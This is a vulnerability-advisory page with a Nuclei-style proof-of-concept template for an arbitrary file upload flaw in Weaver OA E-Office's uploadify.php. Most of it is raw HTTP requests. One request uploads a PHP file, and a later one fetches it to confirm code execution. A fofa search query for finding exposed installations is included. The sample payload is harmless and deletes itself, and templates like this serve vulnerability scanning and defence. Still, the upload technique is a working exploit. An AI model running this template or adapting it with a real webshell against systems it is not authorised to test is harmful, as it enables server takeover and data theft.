weaver-jquery-file-upload: OA E-Office jQuery - Arbitrary File Upload

2025-08-01 OA E-Office jQuery PoC Public

Description

Arbitrary File Upload in OA E-Office jQuery.

PoC

id: weaver-jquery-file-upload

info:
  name: OA E-Office jQuery - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: Arbitrary File Upload in OA E-Office jQuery.
  reference:
    - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
  classification:
    cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    fofa-query: app="泛微-EOffice"
    product: e-office
    vendor: weaver
  tags: weaver,e-office,oa,instrusive,rce,intrusive,vuln

variables:
  filename: "{{to_lower(rand_base(5))}}"
  string: "{{randstr}}"

http:
  - raw:
      - |
        GET /inc/jquery/uploadify/uploadify.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
        Accept-Encoding: gzip

        ------WebKitFormBoundaryjetvpuye
        Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
        Content-Type: application/octet-stream

        <?php echo "{{string}}";unlink(__FILE__);?>
        ------WebKitFormBoundaryjetvpuye--
      - |
        GET /attachment/{{attachmentID}}/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: attachmentID
        internal: true
        regex:
          - "[0-9]{10}"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_3 == 200 && contains(body_3,'{{string}}')"
        condition: and
# digest: 4a0a00473045022100b6b7ed8f057a6a9c3c6776360dadfc03eedc8c727de3f484fe9ba455656e0841022035bb58d371c0e93c0a9099061856fd4db1fdd6068a4d42fde5384ec698431a6a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities